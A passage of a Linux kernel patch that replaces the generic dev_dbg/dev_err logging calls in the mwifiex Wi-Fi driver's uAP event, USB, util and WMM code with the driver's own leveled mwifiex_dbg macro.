adapter->event_body); break; case EVENT_BA_STREAM_TIEMOUT: - dev_dbg(adapter->dev, "event: BA Stream timeout\n"); + mwifiex_dbg(adapter, EVENT, "event: BA Stream timeout\n"); if (priv->media_connected) { ba_timeout = (void *)adapter->event_body; mwifiex_11n_ba_stream_timeout(priv, ba_timeout); } break; case EVENT_EXT_SCAN_REPORT: - dev_dbg(adapter->dev, "event: EXT_SCAN Report\n"); + mwifiex_dbg(adapter, EVENT, "event: EXT_SCAN Report\n"); if (adapter->ext_scan) return mwifiex_handle_event_ext_scan_report(priv, adapter->event_skb->data); break; case EVENT_TX_STATUS_REPORT: - dev_dbg(adapter->dev, "event: TX_STATUS Report\n"); + mwifiex_dbg(adapter, EVENT, "event: TX_STATUS Report\n"); mwifiex_parse_tx_status_event(priv, adapter->event_body); break; case EVENT_PS_SLEEP: - dev_dbg(adapter->dev, "info: EVENT: SLEEP\n"); + mwifiex_dbg(adapter, EVENT, "info: EVENT: SLEEP\n"); adapter->ps_state = PS_STATE_PRE_SLEEP; @@ -187,12 +191,12 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) break; case EVENT_PS_AWAKE: - dev_dbg(adapter->dev, "info: EVENT: AWAKE\n"); + mwifiex_dbg(adapter, EVENT, "info: EVENT: AWAKE\n"); if (!adapter->pps_uapsd_mode && priv->media_connected && adapter->sleep_period.period) { adapter->pps_uapsd_mode = true; - dev_dbg(adapter->dev, - "event: PPS/UAPSD mode activated\n"); + mwifiex_dbg(adapter, EVENT, + "event: PPS/UAPSD mode activated\n"); } adapter->tx_lock_flag = false; if (adapter->pps_uapsd_mode && adapter->gen_null_pkt) { @@ -218,16 +222,16 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) break; case EVENT_CHANNEL_REPORT_RDY: - dev_dbg(adapter->dev, "event: Channel Report\n"); + mwifiex_dbg(adapter, EVENT, "event: Channel Report\n"); mwifiex_11h_handle_chanrpt_ready(priv, adapter->event_skb); break; case EVENT_RADAR_DETECTED: - dev_dbg(adapter->dev, "event: Radar detected\n"); + mwifiex_dbg(adapter, EVENT, "event: Radar detected\n"); mwifiex_11h_handle_radar_detected(priv, adapter->event_skb); break; default: - dev_dbg(adapter->dev, "event: unknown event id: %#x\n", - eventcause); + mwifiex_dbg(adapter, EVENT, + "event: unknown event id: %#x\n", eventcause); break; } diff --git a/drivers/net/wireless/mwifiex/uap_txrx.c b/drivers/net/wireless/mwifiex/uap_txrx.c index 38ac4d74c486..61c52fdf945d 100644 --- a/drivers/net/wireless/mwifiex/uap_txrx.c +++ b/drivers/net/wireless/mwifiex/uap_txrx.c @@ -103,8 +103,8 @@ static void mwifiex_uap_queue_bridged_pkt(struct mwifiex_private *priv, if ((atomic_read(&adapter->pending_bridged_pkts) >= MWIFIEX_BRIDGED_PKTS_THR_HIGH)) { - dev_err(priv->adapter->dev, - "Tx: Bridge packet limit reached. Drop packet!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Tx: Bridge packet limit reached. Drop packet!\n"); kfree_skb(skb); mwifiex_uap_cleanup_tx_queues(priv); return; @@ -153,15 +153,15 @@ static void mwifiex_uap_queue_bridged_pkt(struct mwifiex_private *priv, skb_pull(skb, hdr_chop); if (skb_headroom(skb) < MWIFIEX_MIN_DATA_HEADER_LEN) { - dev_dbg(priv->adapter->dev, - "data: Tx: insufficient skb headroom %d\n", - skb_headroom(skb)); + mwifiex_dbg(priv->adapter, ERROR, + "data: Tx: insufficient skb headroom %d\n", + skb_headroom(skb)); /* Insufficient skb headroom - allocate a new skb */ new_skb = skb_realloc_headroom(skb, MWIFIEX_MIN_DATA_HEADER_LEN); if (unlikely(!new_skb)) { - dev_err(priv->adapter->dev, - "Tx: cannot allocate new_skb\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Tx: cannot allocate new_skb\n"); kfree_skb(skb); priv->stats.tx_dropped++; return; @@ -169,8 +169,9 @@ static void mwifiex_uap_queue_bridged_pkt(struct mwifiex_private *priv, kfree_skb(skb); skb = new_skb; - dev_dbg(priv->adapter->dev, "info: new skb headroom %d\n", - skb_headroom(skb)); + mwifiex_dbg(priv->adapter, INFO, + "info: new skb headroom %d\n", + skb_headroom(skb)); } tx_info = MWIFIEX_SKB_TXCB(skb); @@ -225,7 +226,8 @@ int mwifiex_handle_uap_rx_forward(struct mwifiex_private *priv, /* don't do packet forwarding in disconnected state */ if (!priv->media_connected) { - dev_err(adapter->dev, "drop packet in disconnected state.\n"); + mwifiex_dbg(adapter, ERROR, + "drop packet in disconnected state.\n"); dev_kfree_skb_any(skb); return 0; } @@ -275,10 +277,10 @@ int mwifiex_process_uap_rx_packet(struct mwifiex_private *priv, if ((le16_to_cpu(uap_rx_pd->rx_pkt_offset) + le16_to_cpu(uap_rx_pd->rx_pkt_length)) > (u16) skb->len) { - dev_err(adapter->dev, - "wrong rx packet: len=%d, offset=%d, length=%d\n", - skb->len, le16_to_cpu(uap_rx_pd->rx_pkt_offset), - le16_to_cpu(uap_rx_pd->rx_pkt_length)); + mwifiex_dbg(adapter, ERROR, + "wrong rx packet: len=%d, offset=%d, length=%d\n", + skb->len, le16_to_cpu(uap_rx_pd->rx_pkt_offset), + le16_to_cpu(uap_rx_pd->rx_pkt_length)); priv->stats.rx_dropped++; dev_kfree_skb_any(skb); return 0; @@ -287,7 +289,8 @@ int mwifiex_process_uap_rx_packet(struct mwifiex_private *priv, if (rx_pkt_type == PKT_TYPE_MGMT) { ret = mwifiex_process_mgmt_packet(priv, skb); if (ret) - dev_err(adapter->dev, "Rx of mgmt packet failed"); + mwifiex_dbg(adapter, ERROR, + "Rx of mgmt packet failed"); dev_kfree_skb_any(skb); return ret; } @@ -354,7 +357,8 @@ void *mwifiex_process_uap_txpd(struct mwifiex_private *priv, INTF_HEADER_LEN; if (!skb->len) { - dev_err(adapter->dev, "Tx: bad packet length: %d\n", skb->len); + mwifiex_dbg(adapter, ERROR, + "Tx: bad packet length: %d\n", skb->len); tx_info->status_code = -1; return skb->data; } diff --git a/drivers/net/wireless/mwifiex/usb.c b/drivers/net/wireless/mwifiex/usb.c index fd8027f200a0..aada93425f80 100644 --- a/drivers/net/wireless/mwifiex/usb.c +++ b/drivers/net/wireless/mwifiex/usb.c @@ -60,7 +60,6 @@ static int mwifiex_usb_submit_rx_urb(struct urb_context *ctx, int size); static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, struct sk_buff *skb, u8 ep) { - struct device *dev = adapter->dev; u32 recv_type; __le32 tmp; int ret; @@ -69,13 +68,15 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, mwifiex_process_hs_config(adapter); if (skb->len < INTF_HEADER_LEN) { - dev_err(dev, "%s: invalid skb->len\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: invalid skb->len\n", __func__); return -1; } switch (ep) { case MWIFIEX_USB_EP_CMD_EVENT: - dev_dbg(dev, "%s: EP_CMD_EVENT\n", __func__); + mwifiex_dbg(adapter, EVENT, + "%s: EP_CMD_EVENT\n", __func__); skb_copy_from_linear_data(skb, &tmp, INTF_HEADER_LEN); recv_type = le32_to_cpu(tmp); skb_pull(skb, INTF_HEADER_LEN); @@ -83,11 +84,12 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, switch (recv_type) { case MWIFIEX_USB_TYPE_CMD: if (skb->len > MWIFIEX_SIZE_OF_CMD_BUFFER) { - dev_err(dev, "CMD: skb->len too large\n"); + mwifiex_dbg(adapter, ERROR, + "CMD: skb->len too large\n"); ret = -1; goto exit_restore_skb; } else if (!adapter->curr_cmd) { - dev_dbg(dev, "CMD: no curr_cmd\n"); + mwifiex_dbg(adapter, WARN, "CMD: no curr_cmd\n"); if (adapter->ps_state == PS_STATE_SLEEP_CFM) { mwifiex_process_sleep_confirm_resp( adapter, skb->data, @@ -104,16 +106,19 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, break; case MWIFIEX_USB_TYPE_EVENT: if (skb->len < sizeof(u32)) { - dev_err(dev, "EVENT: skb->len too small\n"); + mwifiex_dbg(adapter, ERROR, + "EVENT: skb->len too small\n"); ret = -1; goto exit_restore_skb; } skb_copy_from_linear_data(skb, &tmp, sizeof(u32)); adapter->event_cause = le32_to_cpu(tmp); - dev_dbg(dev, "event_cause %#x\n", adapter->event_cause); + mwifiex_dbg(adapter, EVENT, + "event_cause %#x\n", adapter->event_cause); if (skb->len > MAX_EVENT_SIZE) { - dev_err(dev, "EVENT: event body too large\n"); + mwifiex_dbg(adapter, ERROR, + "EVENT: event body too large\n"); ret = -1; goto exit_restore_skb; } @@ -125,14 +130,16 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, adapter->event_skb = skb; break; default: - dev_err(dev, "unknown recv_type %#x\n", recv_type); + mwifiex_dbg(adapter, ERROR, + "unknown recv_type %#x\n", recv_type); return -1; } break; case MWIFIEX_USB_EP_DATA: - dev_dbg(dev, "%s: EP_DATA\n", __func__); + mwifiex_dbg(adapter, DATA, "%s: EP_DATA\n", __func__); if (skb->len > MWIFIEX_RX_DATA_BUF_SIZE) { - dev_err(dev, "DATA: skb->len too large\n"); + mwifiex_dbg(adapter, ERROR, + "DATA: skb->len too large\n"); return -1; } @@ -141,7 +148,8 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, atomic_inc(&adapter->rx_pending); break; default: - dev_err(dev, "%s: unknown endport %#x\n", __func__, ep); + mwifiex_dbg(adapter, ERROR, + "%s: unknown endport %#x\n", __func__, ep); return -1; } @@ -176,8 +184,8 @@ static void mwifiex_usb_rx_complete(struct urb *urb) if (recv_length) { if (urb->status || (adapter->surprise_removed)) { - dev_err(adapter->dev, - "URB status is failed: %d\n", urb->status); + mwifiex_dbg(adapter, ERROR, + "URB status is failed: %d\n", urb->status); /* Do not free skb in case of command ep */ if (card->rx_cmd_ep != context->ep) dev_kfree_skb_any(skb); @@ -190,8 +198,9 @@ static void mwifiex_usb_rx_complete(struct urb *urb) status = mwifiex_usb_recv(adapter, skb, context->ep); - dev_dbg(adapter->dev, "info: recv_length=%d, status=%d\n", - recv_length, status); + mwifiex_dbg(adapter, INFO, + "info: recv_length=%d, status=%d\n", + recv_length, status); if (status == -EINPROGRESS) { mwifiex_queue_main_work(adapter); @@ -203,8 +212,8 @@ static void mwifiex_usb_rx_complete(struct urb *urb) return; } else { if (status == -1) - dev_err(adapter->dev, - "received data processing failed!\n"); + mwifiex_dbg(adapter, ERROR, + "received data processing failed!\n"); /* Do not free skb in case of command ep */ if (card->rx_cmd_ep != context->ep) @@ -212,8 +221,8 @@ static void mwifiex_usb_rx_complete(struct urb *urb) } } else if (urb->status) { if (!adapter->is_suspended) { - dev_warn(adapter->dev, - "Card is removed: %d\n", urb->status); + mwifiex_dbg(adapter, FATAL, + "Card is removed: %d\n", urb->status); adapter->surprise_removed = true; } dev_kfree_skb_any(skb); @@ -249,14 +258,17 @@ static void mwifiex_usb_tx_complete(struct urb *urb) struct mwifiex_adapter *adapter = context->adapter; struct usb_card_rec *card = adapter->card; - dev_dbg(adapter->dev, "%s: status: %d\n", __func__, urb->status); + mwifiex_dbg(adapter, INFO, + "%s: status: %d\n", __func__, urb->status); if (context->ep == card->tx_cmd_ep) { - dev_dbg(adapter->dev, "%s: CMD\n", __func__); + mwifiex_dbg(adapter, CMD, + "%s: CMD\n", __func__); atomic_dec(&card->tx_cmd_urb_pending); adapter->cmd_sent = false; } else { - dev_dbg(adapter->dev, "%s: DATA\n", __func__); + mwifiex_dbg(adapter, DATA, + "%s: DATA\n", __func__); atomic_dec(&card->tx_data_urb_pending); mwifiex_write_data_complete(adapter, context->skb, 0, urb->status ? -1 : 0); @@ -275,8 +287,8 @@ static int mwifiex_usb_submit_rx_urb(struct urb_context *ctx, int size) if (card->rx_cmd_ep != ctx->ep) { ctx->skb = dev_alloc_skb(size); if (!ctx->skb) { - dev_err(adapter->dev, - "%s: dev_alloc_skb failed\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: dev_alloc_skb failed\n", __func__); return -ENOMEM; } } @@ -291,7 +303,7 @@ static int mwifiex_usb_submit_rx_urb(struct urb_context *ctx, int size) atomic_inc(&card->rx_data_urb_pending); if (usb_submit_urb(ctx->urb, GFP_ATOMIC)) { - dev_err(adapter->dev, "usb_submit_urb failed\n"); + mwifiex_dbg(adapter, ERROR, "usb_submit_urb failed\n"); dev_kfree_skb_any(ctx->skb); ctx->skb = NULL; @@ -468,7 +480,8 @@ static int mwifiex_usb_suspend(struct usb_interface *intf, pm_message_t message) adapter = card->adapter; if (unlikely(adapter->is_suspended)) - dev_warn(adapter->dev, "Device already suspended\n"); + mwifiex_dbg(adapter, WARN, + "Device already suspended\n"); mwifiex_enable_hs(adapter); @@ -519,7 +532,8 @@ static int mwifiex_usb_resume(struct usb_interface *intf) adapter = card->adapter; if (unlikely(!adapter->is_suspended)) { - dev_warn(adapter->dev, "Device already resumed\n"); + mwifiex_dbg(adapter, WARN, + "Device already resumed\n"); return 0; } @@ -578,7 +592,8 @@ static void mwifiex_usb_disconnect(struct usb_interface *intf) mwifiex_usb_free(card); - dev_dbg(adapter->dev, "%s: removing card\n", __func__); + mwifiex_dbg(adapter, FATAL, + "%s: removing card\n", __func__); mwifiex_remove_card(adapter, &add_remove_card_sem); usb_set_intfdata(intf, NULL); @@ -608,7 +623,8 @@ static int mwifiex_usb_tx_init(struct mwifiex_adapter *adapter) card->tx_cmd.urb = usb_alloc_urb(0, GFP_KERNEL); if (!card->tx_cmd.urb) { - dev_err(adapter->dev, "tx_cmd.urb allocation failed\n"); + mwifiex_dbg(adapter, ERROR, + "tx_cmd.urb allocation failed\n"); return -ENOMEM; } @@ -620,8 +636,8 @@ static int mwifiex_usb_tx_init(struct mwifiex_adapter *adapter) card->tx_data_list[i].urb = usb_alloc_urb(0, GFP_KERNEL); if (!card->tx_data_list[i].urb) { - dev_err(adapter->dev, - "tx_data_list[] urb allocation failed\n"); + mwifiex_dbg(adapter, ERROR, + "tx_data_list[] urb allocation failed\n"); return -ENOMEM; } } @@ -639,15 +655,13 @@ static int mwifiex_usb_rx_init(struct mwifiex_adapter *adapter) card->rx_cmd.urb = usb_alloc_urb(0, GFP_KERNEL); if (!card->rx_cmd.urb) { - dev_err(adapter->dev, "rx_cmd.urb allocation failed\n"); + mwifiex_dbg(adapter, ERROR, "rx_cmd.urb allocation failed\n"); return -ENOMEM; } card->rx_cmd.skb = dev_alloc_skb(MWIFIEX_RX_CMD_BUF_SIZE); - if (!card->rx_cmd.skb) { - dev_err(adapter->dev, "rx_cmd.skb allocation failed\n"); + if (!card->rx_cmd.skb) return -ENOMEM; - } if (mwifiex_usb_submit_rx_urb(&card->rx_cmd, MWIFIEX_RX_CMD_BUF_SIZE)) return -1; @@ -658,8 +672,8 @@ static int mwifiex_usb_rx_init(struct mwifiex_adapter *adapter) card->rx_data_list[i].urb = usb_alloc_urb(0, GFP_KERNEL); if (!card->rx_data_list[i].urb) { - dev_err(adapter->dev, - "rx_data_list[] urb allocation failed\n"); + mwifiex_dbg(adapter, ERROR, + "rx_data_list[] urb allocation failed\n"); return -1; } if (mwifiex_usb_submit_rx_urb(&card->rx_data_list[i], @@ -683,7 +697,8 @@ static int mwifiex_write_data_sync(struct mwifiex_adapter *adapter, u8 *pbuf, ret = usb_bulk_msg(card->udev, usb_sndbulkpipe(card->udev, ep), pbuf, *len, &actual_length, timeout); if (ret) { - dev_err(adapter->dev, "usb_bulk_msg for tx failed: %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "usb_bulk_msg for tx failed: %d\n", ret); return ret; } @@ -702,7 +717,8 @@ static int mwifiex_read_data_sync(struct mwifiex_adapter *adapter, u8 *pbuf, ret = usb_bulk_msg(card->udev, usb_rcvbulkpipe(card->udev, ep), pbuf, *len, &actual_length, timeout); if (ret) { - dev_err(adapter->dev, "usb_bulk_msg for rx failed: %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "usb_bulk_msg for rx failed: %d\n", ret); return ret; } @@ -722,13 +738,13 @@ static int mwifiex_usb_host_to_card(struct mwifiex_adapter *adapter, u8 ep, struct urb *tx_urb; if (adapter->is_suspended) { - dev_err(adapter->dev, - "%s: not allowed while suspended\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: not allowed while suspended\n", __func__); return -1; } if (adapter->surprise_removed) { - dev_err(adapter->dev, "%s: device removed\n", __func__); + mwifiex_dbg(adapter, ERROR, "%s: device removed\n", __func__); return -1; } @@ -737,7 +753,7 @@ static int mwifiex_usb_host_to_card(struct mwifiex_adapter *adapter, u8 ep, return -EBUSY; } - dev_dbg(adapter->dev, "%s: ep=%d\n", __func__, ep); + mwifiex_dbg(adapter, INFO, "%s: ep=%d\n", __func__, ep); if (ep == card->tx_cmd_ep) { context = &card->tx_cmd; @@ -764,7 +780,8 @@ static int mwifiex_usb_host_to_card(struct mwifiex_adapter *adapter, u8 ep, atomic_inc(&card->tx_data_urb_pending); if (usb_submit_urb(tx_urb, GFP_ATOMIC)) { - dev_err(adapter->dev, "%s: usb_submit_urb failed\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: usb_submit_urb failed\n", __func__); if (ep == card->tx_cmd_ep) { atomic_dec(&card->tx_cmd_urb_pending); } else { @@ -843,8 +860,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, u8 check_winner = 1; if (!firmware) { - dev_err(adapter->dev, - "No firmware image found! Terminating download\n"); + mwifiex_dbg(adapter, ERROR, + "No firmware image found! Terminating download\n"); ret = -1; goto fw_exit; } @@ -889,8 +906,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, MWIFIEX_USB_EP_CMD_EVENT, MWIFIEX_USB_TIMEOUT); if (ret) { - dev_err(adapter->dev, - "write_data_sync: failed: %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "write_data_sync: failed: %d\n", + ret); continue; } @@ -902,8 +920,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, MWIFIEX_USB_EP_CMD_EVENT, MWIFIEX_USB_TIMEOUT); if (ret) { - dev_err(adapter->dev, - "read_data_sync: failed: %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "read_data_sync: failed: %d\n", + ret); continue; } @@ -913,17 +932,17 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, /* check 1st firmware block resp for highest bit set */ if (check_winner) { if (le32_to_cpu(sync_fw.cmd) & 0x80000000) { - dev_warn(adapter->dev, - "USB is not the winner %#x\n", - sync_fw.cmd); + mwifiex_dbg(adapter, WARN, + "USB is not the winner %#x\n", + sync_fw.cmd); /* returning success */ ret = 0; goto cleanup; } - dev_dbg(adapter->dev, - "USB is the winner, start to download FW\n"); + mwifiex_dbg(adapter, MSG, + "start to download FW...\n"); check_winner = 0; break; @@ -931,9 +950,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, /* check the firmware block response for CRC errors */ if (sync_fw.cmd) { - dev_err(adapter->dev, - "FW received block with CRC %#x\n", - sync_fw.cmd); + mwifiex_dbg(adapter, ERROR, + "FW received block with CRC %#x\n", + sync_fw.cmd); ret = -1; continue; } @@ -945,8 +964,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, } while ((dnld_cmd != FW_HAS_LAST_BLOCK) && retries); cleanup: - dev_notice(adapter->dev, - "info: FW download over, size %d bytes\n", tlen); + mwifiex_dbg(adapter, MSG, + "info: FW download over, size %d bytes\n", tlen); kfree(recv_buff); kfree(fwdata); diff --git a/drivers/net/wireless/mwifiex/util.c b/drivers/net/wireless/mwifiex/util.c index 22d93af83cfe..3c0b3c1cf259 100644 --- a/drivers/net/wireless/mwifiex/util.c +++ b/drivers/net/wireless/mwifiex/util.c @@ -160,7 +160,8 @@ int mwifiex_init_shutdown_fw(struct mwifiex_private *priv, } else if (func_init_shutdown == MWIFIEX_FUNC_SHUTDOWN) { cmd = HostCmd_CMD_FUNC_SHUTDOWN; } else { - dev_err(priv->adapter->dev, "unsupported parameter\n"); + mwifiex_dbg(priv->adapter, ERROR, + "unsupported parameter\n"); return -1; } @@ -339,9 +340,9 @@ mwifiex_parse_mgmt_packet(struct mwifiex_private *priv, u8 *payload, u16 len, action_code = *(payload + sizeof(struct ieee80211_hdr) + 1); if (category == WLAN_CATEGORY_PUBLIC && action_code == WLAN_PUB_ACTION_TDLS_DISCOVER_RES) { - dev_dbg(priv->adapter->dev, - "TDLS discovery response %pM nf=%d, snr=%d\n", - ieee_hdr->addr2, rx_pd->nf, rx_pd->snr); + mwifiex_dbg(priv->adapter, INFO, + "TDLS discovery response %pM nf=%d, snr=%d\n", + ieee_hdr->addr2, rx_pd->nf, rx_pd->snr); mwifiex_auto_tdls_update_peer_signal(priv, ieee_hdr->addr2, rx_pd->snr, @@ -349,8 +350,8 @@ mwifiex_parse_mgmt_packet(struct mwifiex_private *priv, u8 *payload, u16 len, } break; default: - dev_dbg(priv->adapter->dev, - "unknown mgmt frame subytpe %#x\n", stype); + mwifiex_dbg(priv->adapter, ERROR, + "unknown mgmt frame subytpe %#x\n", stype); } return 0; @@ -372,8 +373,8 @@ mwifiex_process_mgmt_packet(struct mwifiex_private *priv, if (!priv->mgmt_frame_mask || priv->wdev.iftype == NL80211_IFTYPE_UNSPECIFIED) { - dev_dbg(priv->adapter->dev, - "do not receive mgmt frames on uninitialized intf"); + mwifiex_dbg(priv->adapter, ERROR, + "do not receive mgmt frames on uninitialized intf"); return -1; } @@ -467,13 +468,14 @@ int mwifiex_recv_packet(struct mwifiex_private *priv, struct sk_buff *skb) int mwifiex_complete_cmd(struct mwifiex_adapter *adapter, struct cmd_ctrl_node *cmd_node) { - dev_dbg(adapter->dev, "cmd completed: status=%d\n", - adapter->cmd_wait_q.status); + mwifiex_dbg(adapter, CMD, + "cmd completed: status=%d\n", + adapter->cmd_wait_q.status); *(cmd_node->condition) = true; if (adapter->cmd_wait_q.status == -ETIMEDOUT) - dev_err(adapter->dev, "cmd timeout\n"); + mwifiex_dbg(adapter, ERROR, "cmd timeout\n"); else wake_up_interruptible(&adapter->cmd_wait_q.wait); diff --git a/drivers/net/wireless/mwifiex/wmm.c b/drivers/net/wireless/mwifiex/wmm.c index 8be9d1310cde..a8ea21c3340c 100644 --- a/drivers/net/wireless/mwifiex/wmm.c +++ b/drivers/net/wireless/mwifiex/wmm.c @@ -107,7 +107,7 @@ mwifiex_wmm_allocate_ralist_node(struct mwifiex_adapter *adapter, const u8 *ra) ra_list->total_pkt_count = 0; - dev_dbg(adapter->dev, "info: allocated ra_list %p\n", ra_list); + mwifiex_dbg(adapter, INFO, "info: allocated ra_list %p\n", ra_list); return ra_list; } @@ -150,7 +150,8 @@ void mwifiex_ralist_add(struct mwifiex_private *priv, const u8 *ra) for (i = 0; i < MAX_NUM_TID; ++i) { ra_list = mwifiex_wmm_allocate_ralist_node(adapter, ra); - dev_dbg(adapter->dev, "info: created ra_list %p\n", ra_list); + mwifiex_dbg(adapter, INFO, + "info: created ra_list %p\n", ra_list); if (!ra_list) break; @@ -178,8 +179,8 @@ void mwifiex_ralist_add(struct mwifiex_private *priv, const u8 *ra) spin_unlock_irqrestore(&priv->sta_list_spinlock, flags); } - dev_dbg(adapter->dev, "data: ralist %p: is_11n_enabled=%d\n", - ra_list, ra_list->is_11n_enabled); + mwifiex_dbg(adapter, DATA, "data: ralist %p: is_11n_enabled=%d\n", + ra_list, ra_list->is_11n_enabled); if (ra_list->is_11n_enabled) { ra_list->ba_pkt_count = 0; @@ -241,11 +242,12 @@ mwifiex_wmm_setup_queue_priorities(struct mwifiex_private *priv, return; } - dev_dbg(priv->adapter->dev, "info: WMM Parameter IE: version=%d, " - "qos_info Parameter Set Count=%d, Reserved=%#x\n", - wmm_ie->vend_hdr.version, wmm_ie->qos_info_bitmap & - IEEE80211_WMM_IE_AP_QOSINFO_PARAM_SET_CNT_MASK, - wmm_ie->reserved); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM Parameter IE: version=%d,\t" + "qos_info Parameter Set Count=%d, Reserved=%#x\n", + wmm_ie->vend_hdr.version, wmm_ie->qos_info_bitmap & + IEEE80211_WMM_IE_AP_QOSINFO_PARAM_SET_CNT_MASK, + wmm_ie->reserved); for (num_ac = 0; num_ac < ARRAY_SIZE(wmm_ie->ac_params); num_ac++) { u8 ecw = wmm_ie->ac_params[num_ac].ecw_bitmap; @@ -257,10 +259,10 @@ mwifiex_wmm_setup_queue_priorities(struct mwifiex_private *priv, priv->wmm.queue_priority[ac_idx] = ac_idx; tmp[ac_idx] = avg_back_off; - dev_dbg(priv->adapter->dev, - "info: WMM: CWmax=%d CWmin=%d Avg Back-off=%d\n", - (1 << ((ecw & MWIFIEX_ECW_MAX) >> 4)) - 1, - cw_min, avg_back_off); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM: CWmax=%d CWmin=%d Avg Back-off=%d\n", + (1 << ((ecw & MWIFIEX_ECW_MAX) >> 4)) - 1, + cw_min, avg_back_off); mwifiex_wmm_ac_debug_print(&wmm_ie->ac_params[num_ac]); } @@ -333,8 +335,8 @@ mwifiex_wmm_setup_ac_downgrade(struct mwifiex_private *priv) { int ac_val; - dev_dbg(priv->adapter->dev, "info: WMM: AC Priorities:" - "BK(0), BE(1), VI(2), VO(3)\n"); + mwifiex_dbg(priv->adapter, INFO, "info: WMM: AC Priorities:\t" + "BK(0), BE(1), VI(2), VO(3)\n"); if (!priv->wmm_enabled) { /* WMM is not enabled, default priorities */ @@ -346,9 +348,10 @@ mwifiex_wmm_setup_ac_downgrade(struct mwifiex_private *priv) priv->wmm.ac_down_graded_vals[ac_val] = mwifiex_wmm_eval_downgrade_ac(priv, (enum mwifiex_wmm_ac_e) ac_val); - dev_dbg(priv->adapter->dev, - "info: WMM: AC PRIO %d maps to %d\n", - ac_val, priv->wmm.ac_down_graded_vals[ac_val]); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM: AC PRIO %d maps to %d\n", + ac_val, + priv->wmm.ac_down_graded_vals[ac_val]); } } } @@ -521,8 +524,8 @@ static void mwifiex_wmm_delete_all_ralist(struct mwifiex_private *priv) int i; for (i = 0; i < MAX_NUM_TID; ++i) { - dev_dbg(priv->adapter->dev, - "info: ra_list: freeing buf for tid %d\n", i); + mwifiex_dbg(priv->adapter, INFO, + "info: ra_list: freeing buf for tid %d\n", i); list_for_each_entry_safe(ra_list, tmp_node, &priv->wmm.tid_tbl_ptr[i].ra_list, list) { @@ -694,14 +697,15 @@ mwifiex_wmm_add_buf_txqueue(struct mwifiex_private *priv, if (GET_BSS_ROLE(priv) == MWIFIEX_BSS_ROLE_STA && ISSUPP_TDLS_ENABLED(adapter->fw_cap_info)) { if (ntohs(eth_hdr->h_proto) == ETH_P_TDLS) - dev_dbg(adapter->dev, - "TDLS setup packet for %pM. Don't block\n", ra); + mwifiex_dbg(adapter, DATA, + "TDLS setup packet for %pM.\t" + "Don't block\n", ra); else if (memcmp(priv->cfg_bssid, ra, ETH_ALEN)) tdls_status = mwifiex_get_tdls_link_status(priv, ra); } if (!priv->media_connected && !mwifiex_is_skb_mgmt_frame(skb)) { - dev_dbg(adapter->dev, "data: drop packet in disconnect\n"); + mwifiex_dbg(adapter, DATA, "data: drop packet in disconnect\n"); mwifiex_write_data_complete(adapter, skb, 0, -1); return; } @@ -782,6 +786,7 @@ int mwifiex_ret_wmm_get_status(struct mwifiex_private *priv, { u8 *curr = (u8 *) &resp->params.get_wmm_status; uint16_t resp_len = le16_to_cpu(resp->size), tlv_len; + int mask = IEEE80211_WMM_IE_AP_QOSINFO_PARAM_SET_CNT_MASK; bool valid = true; struct mwifiex_ie_types_data *tlv_hdr; @@ -789,8 +794,9 @@ int mwifiex_ret_wmm_get_status(struct mwifiex_private *priv, struct ieee_types_wmm_parameter *wmm_param_ie = NULL; struct mwifiex_wmm_ac_status *ac_status; - dev_dbg(priv->adapter->dev, "info: WMM: WMM_GET_STATUS cmdresp received: %d\n", - resp_len); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM: WMM_GET_STATUS cmdresp received: %d\n", + resp_len); while ((resp_len >= sizeof(tlv_hdr->header)) && valid) { tlv_hdr = (struct mwifiex_ie_types_data *) curr; @@ -804,12 +810,12 @@ int mwifiex_ret_wmm_get_status(struct mwifiex_private *priv, tlv_wmm_qstatus = (struct mwifiex_ie_types_wmm_queue_status *) tlv_hdr; - dev_dbg(priv->adapter->dev, - "info: CMD_RESP: WMM_GET_STATUS:" - " QSTATUS TLV: %d, %d, %d\n", - tlv_wmm_qstatus->queue_index, - tlv_wmm_qstatus->flow_required, - tlv_wmm_qstatus->disabled); + mwifiex_dbg(priv->adapter, CMD, + "info: CMD_RESP: WMM_GET_STATUS:\t" + "QSTATUS TLV: %d, %d, %d\n", + tlv_wmm_qstatus->queue_index, + tlv_wmm_qstatus->flow_required, + tlv_wmm_qstatus->disabled); ac_status = &priv->wmm.ac_status[tlv_wmm_qstatus-> queue_index]; @@ -832,11 +838,10 @@ int mwifiex_ret_wmm_get_status(struct mwifiex_private *priv, wmm_param_ie->vend_hdr.element_id = WLAN_EID_VENDOR_SPECIFIC; - dev_dbg(priv->adapter->dev, - "info: CMD_RESP: WMM_GET_STATUS:" - " WMM Parameter Set Count: %d\n", - wmm_param_ie->qos_info_bitmap & - IEEE80211_WMM_IE_AP_QOSINFO_PARAM_SET_CNT_MASK); + mwifiex_dbg(priv->adapter, CMD, + "info: CMD_RESP: WMM_GET_STATUS:\t" + "WMM Parameter Set Count: %d\n", + wmm_param_ie->qos_info_bitmap & mask); memcpy((u8 *) &priv->curr_bss_params.bss_descriptor. wmm_ie, wmm_param_ie, @@ -884,9 +889,9 @@ mwifiex_wmm_process_association_req(struct 